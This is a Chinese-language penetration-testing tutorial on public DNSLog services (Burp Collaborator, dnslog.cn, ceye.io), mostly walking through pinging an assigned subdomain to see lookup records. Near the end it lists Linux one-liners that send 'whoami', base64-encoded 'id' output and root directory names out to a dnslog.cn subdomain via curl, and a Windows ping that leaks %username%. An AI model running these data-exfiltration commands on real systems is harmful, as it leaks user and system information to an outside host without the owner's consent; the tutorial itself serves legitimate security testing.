常用DNSLog平台

我们在上一篇文章中我们介绍了什么是DNSLog，如果我们自己要去搭建一个DNSLog的服务平台，还是比较复杂和麻烦的，所以我们可以直接去使用一些公开免费的DNSLog平台，DNSLog的平台非常的多，但是实际上大部分的DNSLog的平台都是昙花一现，真正意义上稳定持久的就只有那么几个，那么我们接下来给大家介绍几个常用且稳定的DNSLog平台吧。

Burp Collaborator

首先我们从BurpSuite里面自带的一个工具开始讲起，它是集成在BurpSuite工具里面的，非常方便我们去做渗透测试的时候使用。

第一步，我们点击选项菜单栏中的 Project options

第二步，在 Burp Collaborator Server 选项框中点击 Run health check进行DNSLog服务器连通性的检查

以下画面是检测正常的情况

第三步，点击 Burp 选项栏下的 Burp Collaborator client

进入到以下的界面，点击 Copy to clipboard，复制到粘贴板，这时 BurpSuite的DNSLog服务器会分配给我们一个子域名

我们打开笔记本，按 CTRL + v 便可以粘贴处分配给我们的子域名

现在我们打开 cmd ，去 ping 这个分配给我们的子域名地址，并随便加上一点前缀

然后我们回到页面，点击 Pollnow，

这时，我们便可以看到DNSLog平台回应给我们的解析记录了

dnslog.cn

dnslog.cn是我们国内目前最知名的DNSLog服务平台，也是最常用的DNSLog服务平台，注意使用时使用HTTP协议访问，DNSLog的平台

点击 Get SubDomain获取一个子域名，比如我们这里得到的子域名就是 6rvp56.dnslog.cn

然后我们打开 cmd 去 ping 这个子域名，这里我们在子域名前面随便加上一点前缀

这时，我们回到DNSLog的平台，点击 Refresh Record刷新，会发现已经产生了DNSLog的记录

如果我们想要通过DNSLog平台得到一些系统的信息，那么该怎么办呢？

我们重新点击 Get SubDomain获取一个子域名，比如我们这里得到新的子域名就 j11s5c.dnslog.cn

然后我们打开 cmd 去 ping 这个子域名，这里我们在子域名前面加上一些前缀，比如%username%

然后点击 Refresh Record刷新

这时DNSLog服务平台会响应给我们一些解析记录，比如%username%环境变量

以下是更多的一些Windows的系统环境变量，大家可以自己实验试试

Windows系统环境变量大全

在Linux系统下，大家可以使用以下的语句去测试

#获取变量值：
curl http://`whoami`.xxxxxx.dnslog.cn/
#base64编码输出：
curl http://$(id|base64).xxxxxx.dnslog.cn/
#循环获取文件输出：
for i in $(ls /);do curl
"http://$i.xxxxxx.dnslog.cn/";done;

ceye.io

我们在使用dnslog.cn平台时，会发现有两个缺点，一是dnslog.cn平台所使用的解析记录是不持久保存的，一旦我们关闭了该界面，我们的解析记录就会消失，二是dnslog.cn平台只能支持我们去复制粘贴解析记录的结果，没办法大规模解析和提取我们想要的结果，所以，我们现在去使用一个更高级的DNSLog服务解析平台 ceye.io，它是由知道创宇安全公司推出的一款产品，它很好的解决了我们之前提到的两个问题。

ceye.io有以下特点：

一、提供给我们固定子域名，不会变动
二、DNS解析记录会在账号下保存，不会动不动就消失
三、提供在线API，可以使用各种编程语言调用

我们打开主界面点击 Profile 就可以得到我们相应的信息，这里需要我们提前去绑定手机号和邮箱，否则无法使用

Identifier就是提供给我们的个人固定专属的子域名

那么我们该如何使用呢？我们现在打开cmd，去 ping 我们的子域名并且随便加上一点前缀

然后我们在 DNS Query 便可以看到DNS服务器响应给我们的解析记录，这些解析记录可以保存最多6个小时和最近的100条记录